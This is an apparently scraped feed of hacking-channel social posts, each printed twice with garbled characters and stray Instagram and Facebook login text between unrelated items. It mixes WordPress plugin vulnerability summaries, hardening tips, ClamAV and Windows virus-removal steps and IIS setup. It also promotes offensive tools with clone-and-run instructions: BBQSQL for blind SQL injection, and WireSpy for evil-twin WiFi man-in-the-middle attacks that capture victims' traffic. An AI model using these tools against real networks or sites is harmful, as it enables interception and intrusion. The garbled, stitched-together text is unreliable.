- - - - UาNาDาEาRาCาOาDาEา- - - - -
๐ฆTop 4 Exploited Plugins in WordPress:
(T.me/UnderCodeTestingOfficial
Now, letโs take a look at the four exploited plugins that had endangered thousands of WordPress users. This list showcases the plugins that contained high-risk exploits:
1) Visual CSS Style Editor
Also known as the Yellow Pencil Visual Theme Customizer, this plugin is used to customize color, font, and the overall theme of a website without using code.
> There was a vulnerability found in the 7.1.9 version of this plugin that endangered as many as 30,000 websites. In the yellow-pencil.php file, there is the yp_remote_get_first() function that checks a certain parameter which triggers privilege escalation.
> Unfortunately, this can let users without proper access to perform top-level actions like changing fundamental options. What is the worst-case scenario? A hacker redirecting the homepage or getting full admin access to your site.
2) WooCommerce Checkout Manager
The WooCommerce Checkout Manager plugin customizes a WooCommerce powered online storeโs checkout page. It has more than 50,000 active installations as of writing. This just goes to show that mainstream plugins can also be at risk.
> The plugin had a security flaw that allowed users to delete any media files even unrelated to their checkout process. The deletion of any media in $_POST[โwccm_default_keys_loadโ] also removed the metadata from the siteโs WordPress library.
3) Ad Inserter
Ad Inserter is used to manage ads and has more than 200,000 active installations. It supports platforms like Google Adsense and Amazon Native Shopping Ads.
> allowed authenticated users with any role โ including subscriber โ to execute arbitrary PHP code. Not only that, there was another security hole that allowed regular users to utilize the debug mode that should be available to access for administrators only.
4) Social Warfare
With more than 60,000 users, social warfare is one of the most used lightweight WordPress social sharing plugins.
> In March 2019, there was a bug found in version 3.5.2. It came from its clone feature โ used to duplicate settings from a site โ which was not restricted to the administrator role. The flaw would let hackers overwrite plugin settings on the victimโs site.
> It was found that attackers had modified the twitter_id value that directed to a cross-site scripting injection point.
Written by ฬฏฬฏ ฬตอMฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
- - - - - UาNาDาEาRาCาOาDาEา- - - - -
๐ฆTop 4 Exploited Plugins in WordPress:
(T.me/UnderCodeTestingOfficial
Now, letโs take a look at the four exploited plugins that had endangered thousands of WordPress users. This list showcases the plugins that contained high-risk exploits:
1) Visual CSS Style Editor
Also known as the Yellow Pencil Visual Theme Customizer, this plugin is used to customize color, font, and the overall theme of a website without using code.
> There was a vulnerability found in the 7.1.9 version of this plugin that endangered as many as 30,000 websites. In the yellow-pencil.php file, there is the yp_remote_get_first() function that checks a certain parameter which triggers privilege escalation.
> Unfortunately, this can let users without proper access to perform top-level actions like changing fundamental options. What is the worst-case scenario? A hacker redirecting the homepage or getting full admin access to your site.
2) WooCommerce Checkout Manager
The WooCommerce Checkout Manager plugin customizes a WooCommerce powered online storeโs checkout page. It has more than 50,000 active installations as of writing. This just goes to show that mainstream plugins can also be at risk.
> The plugin had a security flaw that allowed users to delete any media files even unrelated to their checkout process. The deletion of any media in $_POST[โwccm_default_keys_loadโ] also removed the metadata from the siteโs WordPress library.
3) Ad Inserter
Ad Inserter is used to manage ads and has more than 200,000 active installations. It supports platforms like Google Adsense and Amazon Native Shopping Ads.
> allowed authenticated users with any role โ including subscriber โ to execute arbitrary PHP code. Not only that, there was another security hole that allowed regular users to utilize the debug mode that should be available to access for administrators only.
4) Social Warfare
With more than 60,000 users, social warfare is one of the most used lightweight WordPress social sharing plugins.
> In March 2019, there was a bug found in version 3.5.2. It came from its clone feature โ used to duplicate settings from a site โ which was not restricted to the administrator role. The flaw would let hackers overwrite plugin settings on the victimโs site.
> It was found that attackers had modified the twitter_id value that directed to a cross-site scripting injection point.
Written by ฬฏฬฏ ฬตอMฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
- - - - - UาNาDาEาRาCาOาDาEา- - - - -
- - - UาNาDาEาRาCาOาDาEา- - - -
๐ฆ How to SEcure ANY WOrdpress Or wix or.. WEBSITE:๐ฆ
(T.me/UnderCodeTestingOfficial)
With so many ways for bad actors to breach your site, how do you stay protected? The following security practices make for a subset of this extensive WordPress security guide:
1) Keep Your WordPress Updated
Using the latest version of WordPress is highly recommended. Not only can you enjoy the newest features but it also guarantees that the latest known security issues are patched.
2) Check Your Plugins Status Regularly
If youโre unsure about the security of the installed plugins, you can check them manually. This allows you to know if one of your plugins is vulnerable to security breaches.
3) Backup Your Site
In case the worst-case scenario occurs, itโs best to have a clean site backup you can restore your site to, decreasing any downtime. Take help from this guide to take a backup effortlessly.
4) Install a Firewall
An end-point firewall is the best way to protect your site from these attacks. Continuous monitoring and blocking of any malicious traffic can secure your site like no other.
> One such firewall is Astraโs hacker-tested firewall. It is known to block 100+ attacks including common attacks like the SQL injection, XSS, CSRF, Bad bots, etc. You can even use this firewall to block or whitelist IP/range/country that are threats for you.
@ ฬฏฬฏ ฬตอMฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
- - - - - UาNาDาEาRาCาOาDาEา- - - - -
๐ฆ How to SEcure ANY WOrdpress Or wix or.. WEBSITE:๐ฆ
(T.me/UnderCodeTestingOfficial)
With so many ways for bad actors to breach your site, how do you stay protected? The following security practices make for a subset of this extensive WordPress security guide:
1) Keep Your WordPress Updated
Using the latest version of WordPress is highly recommended. Not only can you enjoy the newest features but it also guarantees that the latest known security issues are patched.
2) Check Your Plugins Status Regularly
If youโre unsure about the security of the installed plugins, you can check them manually. This allows you to know if one of your plugins is vulnerable to security breaches.
3) Backup Your Site
In case the worst-case scenario occurs, itโs best to have a clean site backup you can restore your site to, decreasing any downtime. Take help from this guide to take a backup effortlessly.
4) Install a Firewall
An end-point firewall is the best way to protect your site from these attacks. Continuous monitoring and blocking of any malicious traffic can secure your site like no other.
> One such firewall is Astraโs hacker-tested firewall. It is known to block 100+ attacks including common attacks like the SQL injection, XSS, CSRF, Bad bots, etc. You can even use this firewall to block or whitelist IP/range/country that are threats for you.
@ ฬฏฬฏ ฬตอMฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
- - - - - UาNาDาEาRาCาOาDาEา- - - - -
- - - - - UาNาDาEาRาCาOาDาEา- - - - -
๐ฆWhat is BBQSQL?
Blind SQL injection can be a pain to exploit. When the available tools work they work well, but when they don't you have to write something custom. This is time-consuming and tedious. BBQSQL can help you address those issues.
(instagram.com/UnderCodeTestingCompany)
> BBQSQL is a blind SQL injection framework written in Python. It is extremely useful when attacking tricky SQL injection vulnerabilities. BBQSQL is also a semi-automatic tool,
> allowing quite a bit of customization for those hard to trigger SQL injection findings. The tool is built to be database agnostic and is extremely versatile. It also has an intuitive UI to make setting up attacks much easier
๐ฆINSTALLISATION & RUN:
1) its require linux os
first clone this repo
> git clone https://github.com/Neohapsis/bbqsql
2) cd bbqsql
3)Or for kali (debian base os)
open terminal and type:
>sudo pip install bbqsql
๐ฆHOW RUN?
SOME COMMANDS:
${row_index}: This tells bbqSQL to iterate rows here. Since we are using LIMIT we can view n number of row depending on ${row_index} value.
${char_index}: This tells bbqSQL which character from the subselect to query.
${char_val}: This tells bbqSQL where to compare the results from the subselect to validate the result.
${comparator}: This is how you tell BBQSQL to compare the responses to determine if the result is true or not. By default, the > symbol is used.
${sleep}: This is optional but tells bbqSQL where to insert the number of seconds to sleep when performing time based SQL injection.
Not all of these place holders are required. For example, if you have discovered semi-blind boolean based SQL injection you can omit the ${sleep} parameter.
๐ฆDon t missing those requests:
Similar to other SQL injection tools you provide certain request information.
> URL
> HTTP Method
>Headers
>Cookies
>Encoding methods
>Redirect behavior
>Files
>HTTP Auth
>Proxies
@ Mr. BotNet(tm)
- - - - - UาNาDาEาRาCาOาDาEา- - - - -
๐ฆWhat is BBQSQL?
Blind SQL injection can be a pain to exploit. When the available tools work they work well, but when they don't you have to write something custom. This is time-consuming and tedious. BBQSQL can help you address those issues.
(instagram.com/UnderCodeTestingCompany)
> BBQSQL is a blind SQL injection framework written in Python. It is extremely useful when attacking tricky SQL injection vulnerabilities. BBQSQL is also a semi-automatic tool,
> allowing quite a bit of customization for those hard to trigger SQL injection findings. The tool is built to be database agnostic and is extremely versatile. It also has an intuitive UI to make setting up attacks much easier
๐ฆINSTALLISATION & RUN:
1) its require linux os
first clone this repo
> git clone https://github.com/Neohapsis/bbqsql
2) cd bbqsql
3)Or for kali (debian base os)
open terminal and type:
>sudo pip install bbqsql
๐ฆHOW RUN?
SOME COMMANDS:
${row_index}: This tells bbqSQL to iterate rows here. Since we are using LIMIT we can view n number of row depending on ${row_index} value.
${char_index}: This tells bbqSQL which character from the subselect to query.
${char_val}: This tells bbqSQL where to compare the results from the subselect to validate the result.
${comparator}: This is how you tell BBQSQL to compare the responses to determine if the result is true or not. By default, the > symbol is used.
${sleep}: This is optional but tells bbqSQL where to insert the number of seconds to sleep when performing time based SQL injection.
Not all of these place holders are required. For example, if you have discovered semi-blind boolean based SQL injection you can omit the ${sleep} parameter.
๐ฆDon t missing those requests:
Similar to other SQL injection tools you provide certain request information.
> URL
> HTTP Method
>Headers
>Cookies
>Encoding methods
>Redirect behavior
>Files
>HTTP Auth
>Proxies
@ Mr. BotNet(tm)
- - - - - UาNาDาEาRาCาOาDาEา- - - - -
Instagram
Login โข Instagram
Welcome back to Instagram. Sign in to check out what your friends, family & interests have been capturing & sharing around the world.
- - - - - UาNาDาEาRาCาOาDาEา- - - - -
๐ฆWireSpy enables the automation of various WiFi attacks to conduct Man-In-The-Middle-Attacks (MITMAs).
(facebook.com/UnderCodeTestingCompanie)
๐ฆLET S START:
WireSpy allows attackers to set up quick honeypots to carry out MITMAs. Monitoring and logging functionality is implemented in order to keep records of the victims' traffic/activities. Other tools can be used together with Wirespy to conduct more advanced attacks.
Two type of attacks are supported at the moment:
A) Evil twin: Force victims to auto-connect to the honeypot by spoofing a "trusted" hotspot (clone an existing access point and de-authenticate its users to force them to transparently connect to the spoofed honeypot).
B) Honeypot: Set up a simple rogue hotspot and wait for clients to connect.
๐ฆINSTALLISATION & RUN:
(work root termux)
1) git clone https://github.com/aress31/wirespy
2) cd wirespy
3) chmod +x wirespy.sh
> Run the script with root privileges:
4) sudo ./wirespy.sh
5) Type help to display the list of available commands.
๐ฆFeatures:
> Capture victims' traffic.
>MAC address spoofing.
> Set-up honeypot and evil twin attacks.
> Show the list of in range access points.
> Wireless adapter|card|dongle power amplification.
๐ฆTested On:
> kali linux
> Termux
> parrot
@ Steave(tm)
- - - - - UาNาDาEาRาCาOาDาEา- - - - -
๐ฆWireSpy enables the automation of various WiFi attacks to conduct Man-In-The-Middle-Attacks (MITMAs).
(facebook.com/UnderCodeTestingCompanie)
๐ฆLET S START:
WireSpy allows attackers to set up quick honeypots to carry out MITMAs. Monitoring and logging functionality is implemented in order to keep records of the victims' traffic/activities. Other tools can be used together with Wirespy to conduct more advanced attacks.
Two type of attacks are supported at the moment:
A) Evil twin: Force victims to auto-connect to the honeypot by spoofing a "trusted" hotspot (clone an existing access point and de-authenticate its users to force them to transparently connect to the spoofed honeypot).
B) Honeypot: Set up a simple rogue hotspot and wait for clients to connect.
๐ฆINSTALLISATION & RUN:
(work root termux)
1) git clone https://github.com/aress31/wirespy
2) cd wirespy
3) chmod +x wirespy.sh
> Run the script with root privileges:
4) sudo ./wirespy.sh
5) Type help to display the list of available commands.
๐ฆFeatures:
> Capture victims' traffic.
>MAC address spoofing.
> Set-up honeypot and evil twin attacks.
> Show the list of in range access points.
> Wireless adapter|card|dongle power amplification.
๐ฆTested On:
> kali linux
> Termux
> parrot
@ Steave(tm)
- - - - - UาNาDาEาRาCาOาDาEา- - - - -
Facebook
Log in or sign up to view
See posts, photos and more on Facebook.
- - - - - UาNาDาEาRาCาOาDาEา- - - -
๐ฆWhy Linux is More Secure than Windows +
How install Anitvirus linux:
(t.me/UnderCodeTestingOfficial)
๐ ป๐ ด๐ ๐ ๐๐๐ ฐ๏ธ๐๐:
1) Hackers donโt typically target Linux
The most cited reason for Linuxโs safety relates to its low usage numbers. Linux has less than three percent of the market, compared to Windows, which operates on more than 80 percent of all devices. Microsoft and Linux are practically friends now, so that might change a little. (Probably to Microsoftโs favor.)
2) Itโs more difficult to execute a dangerous attachment in the Linux OS
If youโve never worked with Linux, you may not realize that it doesnโt operate quite the same as Windows or Mac. In those environments, opening a dangerous attachment is simply a matter of double-clicking.
Linux is easy to learn with the right resources, but there are extra steps to take before executing a malicious software. On Linux, users need to save the attachment before executing it, and if set up correctly, they would need permissions granted before they could open it.
3) Linux does not give users admin access by default
In a Windows environment, users are often given a high level of access automatically. This lets them click on links and download files indiscriminately, easily leading to the issues mentioned above. Many users donโt have access to the root directories on their computers, which means that even if they do manage to infect their systems, theyโll be limited in the damage they can do.
4) Linux has more people looking out for security issues
Although Microsoft has an army of developers working on their OS, the number of developers working on Linux is bigger. And thatโs one of the biggest reasons to go Linux.
>Although Linux may be safer, there are things administrators can do to keep systems safe. If a hacker does target your network, these small measures will either prevent it or minimize any damage it might do
๐ฆI recommended to members in undercOde to
use clamav abti-viruse more safer( for debian base install)
> apt-get update
> apt-get install clamav
& its avaible for any linux distro
official site:
> https://www.clamav.net/documents/installing-clamav
Written By Steave(tm)
- - - - - UาNาDาEาRาCาOาDาEา- - - - -
๐ฆWhy Linux is More Secure than Windows +
How install Anitvirus linux:
(t.me/UnderCodeTestingOfficial)
๐ ป๐ ด๐ ๐ ๐๐๐ ฐ๏ธ๐๐:
1) Hackers donโt typically target Linux
The most cited reason for Linuxโs safety relates to its low usage numbers. Linux has less than three percent of the market, compared to Windows, which operates on more than 80 percent of all devices. Microsoft and Linux are practically friends now, so that might change a little. (Probably to Microsoftโs favor.)
2) Itโs more difficult to execute a dangerous attachment in the Linux OS
If youโve never worked with Linux, you may not realize that it doesnโt operate quite the same as Windows or Mac. In those environments, opening a dangerous attachment is simply a matter of double-clicking.
Linux is easy to learn with the right resources, but there are extra steps to take before executing a malicious software. On Linux, users need to save the attachment before executing it, and if set up correctly, they would need permissions granted before they could open it.
3) Linux does not give users admin access by default
In a Windows environment, users are often given a high level of access automatically. This lets them click on links and download files indiscriminately, easily leading to the issues mentioned above. Many users donโt have access to the root directories on their computers, which means that even if they do manage to infect their systems, theyโll be limited in the damage they can do.
4) Linux has more people looking out for security issues
Although Microsoft has an army of developers working on their OS, the number of developers working on Linux is bigger. And thatโs one of the biggest reasons to go Linux.
>Although Linux may be safer, there are things administrators can do to keep systems safe. If a hacker does target your network, these small measures will either prevent it or minimize any damage it might do
๐ฆI recommended to members in undercOde to
use clamav abti-viruse more safer( for debian base install)
> apt-get update
> apt-get install clamav
& its avaible for any linux distro
official site:
> https://www.clamav.net/documents/installing-clamav
Written By Steave(tm)
- - - - - UาNาDาEาRาCาOาDาEา- - - - -
- - - - - UาNาDาEาRาCาOาDาEา- - - - -
๐ฆHow to Use CMD to Remove Virus from Any Drive in Windows 10
(instagram.com/UnderCodeTestingCompany)
๐ ป๐ ด๐ ๐ ๐๐๐ ฐ๏ธ๐๐:
> Now, follow the steps below to delete viruses from your computer or storage device using CMD.
1) Type cmd in the search bar, right-click "Command Prompt" and choose "Run as an administrator".
2) Type F: and press "Enter". (Replace "F" with the drive letter of the infected partition or device.)
3) Type attrib -s -h -r /s /d *.* and hit "Enter".
4) Type dir and hit "Enter". Now you will see all the files under the assigned drive. (The dir command displays a list of a directory's files and subdirectories.)
5) For your information, a virus name may contain words like "autorun" and with ".inf" as the extension. Thus, if you find such suspicious files, type del autorun.inf to remove the virus.
>the official software http://down.easeus.com/product/drw_trial_setup
6) Here are the basic attributes of the 'attrib' command:
๐ฆSome usefull commands:
R โ represents the "Read-only" attribute of a file or folder. Read-only means the file cannot be written on or executed.
H โ the "Hidden" attribute.
A โ stands for "Archiving" which prepares a file for archiving.
S โ the "System" attribute changes the selected files or folders from user files into system files.
I - "not content indexed file" attribute.
>The "attrib" Syntax:
>ATTRIB [+ attribute | โ attribute] [pathname] [/S [/D]]
>In the above command, let's see what the different parameters and switches are:
'+ / โ': To enact or to cancel the specified attribute.
'attribute': As explained above.
'/S': Searching throughout the entire path including subfolders.
'/D': Include any process folder.
'pathname': Path where the target file or folder is located.
Here is the proper syntax order for attrib command:
ATTRIB [+R | -R] [+A | -A ] [+S | -S] [+H | -H] [+I | -I] [drive:][path][filename] [/S [/D] [/L]]
use cmd to remove virus in Windows 10
Written BY mr. Botnet(tm)
- - - - - UาNาDาEาRาCาOาDาEา- - - - -
๐ฆHow to Use CMD to Remove Virus from Any Drive in Windows 10
(instagram.com/UnderCodeTestingCompany)
๐ ป๐ ด๐ ๐ ๐๐๐ ฐ๏ธ๐๐:
> Now, follow the steps below to delete viruses from your computer or storage device using CMD.
1) Type cmd in the search bar, right-click "Command Prompt" and choose "Run as an administrator".
2) Type F: and press "Enter". (Replace "F" with the drive letter of the infected partition or device.)
3) Type attrib -s -h -r /s /d *.* and hit "Enter".
4) Type dir and hit "Enter". Now you will see all the files under the assigned drive. (The dir command displays a list of a directory's files and subdirectories.)
5) For your information, a virus name may contain words like "autorun" and with ".inf" as the extension. Thus, if you find such suspicious files, type del autorun.inf to remove the virus.
>the official software http://down.easeus.com/product/drw_trial_setup
6) Here are the basic attributes of the 'attrib' command:
๐ฆSome usefull commands:
R โ represents the "Read-only" attribute of a file or folder. Read-only means the file cannot be written on or executed.
H โ the "Hidden" attribute.
A โ stands for "Archiving" which prepares a file for archiving.
S โ the "System" attribute changes the selected files or folders from user files into system files.
I - "not content indexed file" attribute.
>The "attrib" Syntax:
>ATTRIB [+ attribute | โ attribute] [pathname] [/S [/D]]
>In the above command, let's see what the different parameters and switches are:
'+ / โ': To enact or to cancel the specified attribute.
'attribute': As explained above.
'/S': Searching throughout the entire path including subfolders.
'/D': Include any process folder.
'pathname': Path where the target file or folder is located.
Here is the proper syntax order for attrib command:
ATTRIB [+R | -R] [+A | -A ] [+S | -S] [+H | -H] [+I | -I] [drive:][path][filename] [/S [/D] [/L]]
use cmd to remove virus in Windows 10
Written BY mr. Botnet(tm)
- - - - - UาNาDาEาRาCาOาDาEา- - - - -
Instagram
Login โข Instagram
Welcome back to Instagram. Sign in to check out what your friends, family & interests have been capturing & sharing around the world.
- - - - UาNาDาEาRาCาOาDาEา- - - - -
๐ฆCan I CONFIGURE Windows Server to host a website?
PART 1
(instagram.com/UnderCodeTestingCompany)
๐ฆ๐ ป๐ ด๐ ๐ ๐๐๐ ฐ๏ธ๐๐:
> set up your first IIS Web site
>Configure a default Web site
๐ฆWhen you install IIS, it is preconfigured to serve as a default Web site; however, you may want to change some of the settings. To change the basic settings for the Web site and to emulate the steps that are required to set up Apache for the first time by using the configuration file:
1) Log on to the Web server computer as an administrator.
2) Click Start, point to Settings, and then click Control Panel.
3) Double-click Administrative Tools, and then double-click Internet Services Manager.
4) Right-click the Web site that you want to configure in the left pane, and then click Properties.
5) Click the Web site tab.
6) Type a description for the Web site in the Description box.
7) Type the Internet Protocol (IP) address to use for the Web site or leave the All (Unassigned) default setting.
8) Modify the Transmission Control Protocol (TCP) port as appropriate.
9) Click the Home Directory tab.
10) To use a folder on the local computer, click A directory on this computer, and then click Browse to locate the folder that you want to use.
11) To use a folder that has been shared from another computer on the network, click A share located on another computer, and then either type the network path or click Browse to select the shared folder.
12) Click Read to grant read access to the folder (required).
13) Click OK to accept the Web site properties.
14) Create a new Web site
> To create a new Web site in Apache, you must set up a virtual host and configure the individual settings for the host. If you are using IIS, you can
written by Mr. Botnet(tm)
- - - - UาNาDาEาRาCาOาDาEา- - - -
๐ฆCan I CONFIGURE Windows Server to host a website?
PART 1
(instagram.com/UnderCodeTestingCompany)
๐ฆ๐ ป๐ ด๐ ๐ ๐๐๐ ฐ๏ธ๐๐:
> set up your first IIS Web site
>Configure a default Web site
๐ฆWhen you install IIS, it is preconfigured to serve as a default Web site; however, you may want to change some of the settings. To change the basic settings for the Web site and to emulate the steps that are required to set up Apache for the first time by using the configuration file:
1) Log on to the Web server computer as an administrator.
2) Click Start, point to Settings, and then click Control Panel.
3) Double-click Administrative Tools, and then double-click Internet Services Manager.
4) Right-click the Web site that you want to configure in the left pane, and then click Properties.
5) Click the Web site tab.
6) Type a description for the Web site in the Description box.
7) Type the Internet Protocol (IP) address to use for the Web site or leave the All (Unassigned) default setting.
8) Modify the Transmission Control Protocol (TCP) port as appropriate.
9) Click the Home Directory tab.
10) To use a folder on the local computer, click A directory on this computer, and then click Browse to locate the folder that you want to use.
11) To use a folder that has been shared from another computer on the network, click A share located on another computer, and then either type the network path or click Browse to select the shared folder.
12) Click Read to grant read access to the folder (required).
13) Click OK to accept the Web site properties.
14) Create a new Web site
> To create a new Web site in Apache, you must set up a virtual host and configure the individual settings for the host. If you are using IIS, you can
written by Mr. Botnet(tm)
- - - - UาNาDาEาRาCาOาDาEา- - - -
Instagram
Login โข Instagram
Welcome back to Instagram. Sign in to check out what your friends, family & interests have been capturing & sharing around the world.